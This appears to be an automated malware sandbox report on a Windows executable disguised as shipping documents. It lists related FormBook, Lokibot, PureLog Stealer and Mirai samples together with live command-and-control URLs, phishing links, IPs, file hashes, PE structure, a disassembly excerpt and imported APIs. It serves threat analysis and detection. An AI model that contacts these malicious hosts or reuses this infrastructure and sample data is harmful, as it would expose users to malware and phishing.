• Number of non-executed functions: 281
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: SHIPPING DOCUMENTS_PDF.exe
Time | Type | Description
18:18:53 | API Interceptor | 12687541x Sleep call for process: waitfor.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3.125.36.175 | http://vpnconsumer.com | malicious | Unknown |
3.125.36.175 | https://www.tryinteract.com/share/quiz/673350c22861f600153c2f9c | malicious | Unknown |
3.125.36.175 | Https://mt5-deriv-server-02.netlify.app | malicious | Unknown |
161.97.142.144 | PO2412010.exe | malicious | FormBook | www.070002018.xyz/6m2n/
161.97.142.144 | New Purchase Order.exe | malicious | FormBook | www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
161.97.142.144 | Quotation Validity.exe | malicious | FormBook, PureLog Stealer | www.070002018.xyz/6m2n/
161.97.142.144 | Order MEI PO IM202411484.exe | malicious | FormBook | www.030002613.xyz/xd9h/
161.97.142.144 | Documents.exe | malicious | FormBook, PureLog Stealer | www.030002449.xyz/cfqm/
161.97.142.144 | PAYMENT_TO_NFTC_(CUB)_26-11-24.doc | malicious | DarkTortilla, FormBook | www.070001955.xyz/7zj0/
161.97.142.144 | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | www.54248711.xyz/jm2l/
161.97.142.144 | IETC-24017.exe | malicious | FormBook, PureLog Stealer | www.030002613.xyz/xd9h/
161.97.142.144 | Purchase Order PO.exe | malicious | FormBook | www.070002018.xyz/6m2n/
161.97.142.144 | PO #2411071822.exe | malicious | FormBook | www.54248711.xyz/jm2l/
209.74.79.42 | Pp7OXMFwqhXKx5Y.exe | malicious | FormBook | www.glowups.life/dheh/
209.74.79.42 | 72STaC6BmljfbIQ.exe | malicious | FormBook | www.primespot.live/b8eq/
172.67.176.240 | XOED07456754893.BAT.exe | malicious | Lokibot | obilok.xyz/dx/77.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.17jkgl.com | Pre Alert PO TVKJEANSA00967.bat.exe | malicious | FormBook, PureLog Stealer | 38.6.78.235
dns.ladipage.com | CJE003889.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | MAERSK LINE SHIPPING DOC_4253.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | QUOTATON-37839993.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | New Purchase Order.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | Docs.exe | malicious | FormBook, PureLog Stealer | 18.139.62.226
dns.ladipage.com | XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe | malicious | FormBook, PureLog Stealer | 13.228.81.39
dns.ladipage.com | Swift copy.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | wavjjT3sEq.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | Order.exe | malicious | FormBook, PureLog Stealer | 54.179.173.60
www.primespot.live | 72STaC6BmljfbIQ.exe | malicious | FormBook | 209.74.79.42
b1-3-r111.kunlundns.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 43.155.76.124
b1-3-r111.kunlundns.top | SWIFT COPY 0028_pdf.exe | malicious | FormBook | 43.155.76.124
b1-3-r111.kunlundns.top | PO-DC13112024_pdf.vbs | malicious | Unknown | 43.155.76.124
b1-3-r111.kunlundns.top | 3NvALxFlHV.exe | malicious | FormBook | 43.155.76.124
b1-3-r111.kunlundns.top | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | FormBook | 43.155.76.124
b1-3-r111.kunlundns.top | QUOTE2342534.exe | malicious | FormBook | 129.226.56.200
b1-3-r111.kunlundns.top | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exe | malicious | FormBook | 129.226.56.200
b1-3-r111.kunlundns.top | Re property pdf.exe | malicious | FormBook | 129.226.56.200
thezensive.netlify.app | Salmebogs(1).exe | malicious | FormBook, GuLoader | 3.75.10.80
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | jew.ppc.elf | malicious | Unknown | 18.226.64.181
AMAZON-02US | jew.mips.elf | malicious | Unknown | 52.52.10.186
AMAZON-02US | jew.arm7.elf | malicious | Mirai | 54.195.68.141
AMAZON-02US | jew.arm6.elf | malicious | Unknown | 34.247.205.175
AMAZON-02US | https://newdocumentsproposal.webflow.io/ | malicious | Captcha Phish, HTMLPhisher | 13.227.9.227
AMAZON-02US | x86_64.elf | malicious | Mirai | 100.20.19.195
AMAZON-02US | i686.elf | malicious | Mirai | 18.240.63.133
AMAZON-02US | x86.elf | malicious | Mirai | 18.196.227.86
AMAZON-02US | main_arm5.elf | malicious | Mirai | 34.249.145.219
AMAZON-02US | [EXTERNAL] Doug Lenon shared _GARY LEIMER INC SIGNED CONTRACT & PAY APPLICATIONS.paper_ with you.eml | malicious | Unknown | 46.137.111.148
MULTIBAND-NEWHOPEUS | Nieuwebestellingen10122024.exe | malicious | FormBook | 209.74.64.187
MULTIBAND-NEWHOPEUS | CJE003889.exe | malicious | FormBook | 209.74.79.40
MULTIBAND-NEWHOPEUS | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 209.74.79.41
MULTIBAND-NEWHOPEUS | PO2412010.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | Recibos.exe | malicious | FormBook | 209.74.77.108
MULTIBAND-NEWHOPEUS | SN500, SN150 Spec.exe | malicious | FormBook | 209.74.64.190
MULTIBAND-NEWHOPEUS | DHL_734825510.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | SRT68.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | UPDATED CONTRACT.exe | malicious | FormBook | 209.74.77.107
MULTIBAND-NEWHOPEUS | Invoice 10493.exe | malicious | FormBook | 209.74.77.109
WIIUS | arm.nn.elf | malicious | Mirai, Okiru | 173.208.191.42
WIIUS | mpsl.elf | malicious | Mirai, Moobot | 69.197.135.107
WIIUS | loligang.arm7.elf | malicious | Mirai | 69.197.241.147
WIIUS | nabppc.elf | malicious | Unknown | 173.208.211.170
WIIUS | la.bot.mips.elf | malicious | Unknown | 173.208.128.129
WIIUS | la.bot.arm.elf | malicious | Unknown | 204.12.226.228
WIIUS | m68k.elf | malicious | Mirai | 173.208.146.198
WIIUS | http://pub-21beea42d44e4f0e83b5336b9ac3900a.r2.dev/woosf.html | malicious | Unknown | 173.208.194.98
WIIUS | ZEjcJZcrXc.elf | malicious | Mirai | 173.208.146.179
WIIUS | https://is.gd/by2jss | malicious | Unknown | 173.208.194.98
CONTABODE | PO2412010.exe | malicious | FormBook | 161.97.142.144
CONTABODE | MAERSK LINE SHIPPING DOC_4253.exe | malicious | FormBook | 161.97.142.144
CONTABODE | Need Price Order No.17084 PARLOK.exe | malicious | FormBook | 161.97.168.245
CONTABODE | lgkWBwqY15.exe | malicious | FormBook | 161.97.168.245
CONTABODE | New quotation request.exe | malicious | FormBook | 161.97.168.245
CONTABODE | UPDATED CONTRACT.exe | malicious | FormBook | 161.97.168.245
CONTABODE | sora.m68k.elf | malicious | Mirai | 167.86.111.146
CONTABODE | PO 4110007694.exe | malicious | FormBook | 161.97.168.245
CONTABODE | Latest advice payment.exe | malicious | FormBook | 161.97.168.245
CONTABODE | New Purchase Order.exe | malicious | FormBook | 161.97.142.144
Process: C:\Windows\SysWOW64\waitfor.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\SHIPPING DOCUMENTS_PDF.exe
File Type: data
Category: dropped
Size (bytes): 288256
Entropy (8bit): 7.9957419363014886
Encrypted: true
SSDEEP: 6144:AGAFHZFi8WDZgc9kRNu4+qKQLK97cCtIh5aUlIl7um5c5vD1EzlSj9:AGkFD2ucOuWKQ297btIJIIy9zlc9
MD5: 6FA2AC7A13121F3B6517216B5966661E
SHA1: B46A0B4640B0FDBE5B9C4093645F8B1EB1746215
SHA-256: 91C2D0FB0BD96D071AC233F5C9F8ACE16E7562D0A0D6FD734D3BCBEED83ECF10
SHA-512: AC61235AFCAA844B21FA31C892D1CF8A8BAAF757DE723BCB580C58F5AD9DB4ACC7738D5447C1FD08AEA8B4A6893FF71724671C3DFBEDA3C70BD84139A0D3B235
Malicious: false
Reputation: low
                                                                                  Preview:...W3YX63VVQ..U2.8LDBAJE.U31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW.YX69I._U.\.`.M..`.- &.A754%Q4xUV88>!d7WaJ9*b($e..`.(572.TU<.VVQUDU289E..!-.t5T.x:4.*....61.O...}X+.X..u5T..30?.9?.7VVQUDU2.}LD.@KEp..mEZSW0YX6.VTP^E^2AlHDBAJEIU31UOSW0IX67&RQUD.2A(LDBCJEOU31EZSW6YX67VVQU4Q2A:LDBAJEKUs.EZCW0IX67VFQUTU2A8LDRAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQ{00J58LD..NEIE31E.WW0IX67VVQUDU2A8LDbAJ%IU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LDBAJEIU31EZSW0YX67VVQUDU2A8LD
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.169434051549643
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:SHIPPING DOCUMENTS_PDF.exe
                                                                                  File size:1'188'352 bytes
                                                                                  MD5:8a85446ebb8eb07a56672afa7c1b7fbc
                                                                                  SHA1:bc089650b78a7ebd5210ab0ae9609df50497a9d3
                                                                                  SHA256:dfd126e677ab29f2de7b5305b3fcf75d096f2a1f69f79b6513136be7965f73f7
                                                                                  SHA512:0b09313a0b5933726705c149d058ca98012b57aac38409eea3cae7764dbe3ccd50f9266909465b8f715874e02f655e9774191fd5de01585614f2f2b98289cc25
                                                                                  SSDEEP:24576:Fu6J33O0c+JY5UZ+XC0kGso6FaC9TRjarp5BR/+NdWY:Hu0c++OCvkGs9FaCatZhY
                                                                                  TLSH:B745BF2273DDC360CB769173BF6AB7016EBF78610630B85B2F980D7DA950161262D7A3
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                  Icon Hash:aaf3e3e3938382a0
                                                                                  Entrypoint:0x427dcd
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x675781BC [Mon Dec 9 23:48:12 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                  Instruction
                                                                                  call 00007F6E0C90CF3Ah
                                                                                  jmp 00007F6E0C8FFD04h
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [esp+10h]
                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007F6E0C8FFE8Ah
                                                                                  cmp edi, eax
                                                                                  jc 00007F6E0C9001EEh
                                                                                  bt dword ptr [004C31FCh], 01h
                                                                                  jnc 00007F6E0C8FFE89h
                                                                                  rep movsb
                                                                                  jmp 00007F6E0C90019Ch
                                                                                  cmp ecx, 00000080h
                                                                                  jc 00007F6E0C900054h
                                                                                  mov eax, edi
                                                                                  xor eax, esi
                                                                                  test eax, 0000000Fh
                                                                                  jne 00007F6E0C8FFE90h
                                                                                  bt dword ptr [004BE324h], 01h
                                                                                  jc 00007F6E0C900360h
                                                                                  bt dword ptr [004C31FCh], 00000000h
                                                                                  jnc 00007F6E0C90002Dh
                                                                                  test edi, 00000003h
                                                                                  jne 00007F6E0C90003Eh
                                                                                  test esi, 00000003h
                                                                                  jne 00007F6E0C90001Dh
                                                                                  bt edi, 02h
                                                                                  jnc 00007F6E0C8FFE8Fh
                                                                                  mov eax, dword ptr [esi]
                                                                                  sub ecx, 04h
                                                                                  lea esi, dword ptr [esi+04h]
                                                                                  mov dword ptr [edi], eax
                                                                                  lea edi, dword ptr [edi+04h]
                                                                                  bt edi, 03h
                                                                                  jnc 00007F6E0C8FFE93h
                                                                                  movq xmm1, qword ptr [esi]
                                                                                  sub ecx, 08h
                                                                                  lea esi, dword ptr [esi+08h]
                                                                                  movq qword ptr [edi], xmm1
                                                                                  lea edi, dword ptr [edi+08h]
                                                                                  test esi, 00000007h
                                                                                  je 00007F6E0C8FFEE5h
                                                                                  bt esi, 03h
                                                                                  jnc 00007F6E0C8FFF38h
                                                                                  Programming Language:
                                                                                  • [ASM] VS2013 build 21005
                                                                                  • [ C ] VS2013 build 21005
                                                                                  • [C++] VS2013 build 21005
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [ASM] VS2013 UPD4 build 31101
                                                                                  • [RES] VS2013 build 21005
                                                                                  • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x59904 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x121000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x59904 | 0x59a00 | 5d794f0e03a658608a582d24580c833b | False | 0.9266556616108786 | data | 7.892073146572697 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x121000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x50bc9 | data | | | 1.0003356546929667
RT_GROUP_ICON | 0x120384 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1203fc | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x120410 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x120424 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x120438 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x120514 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
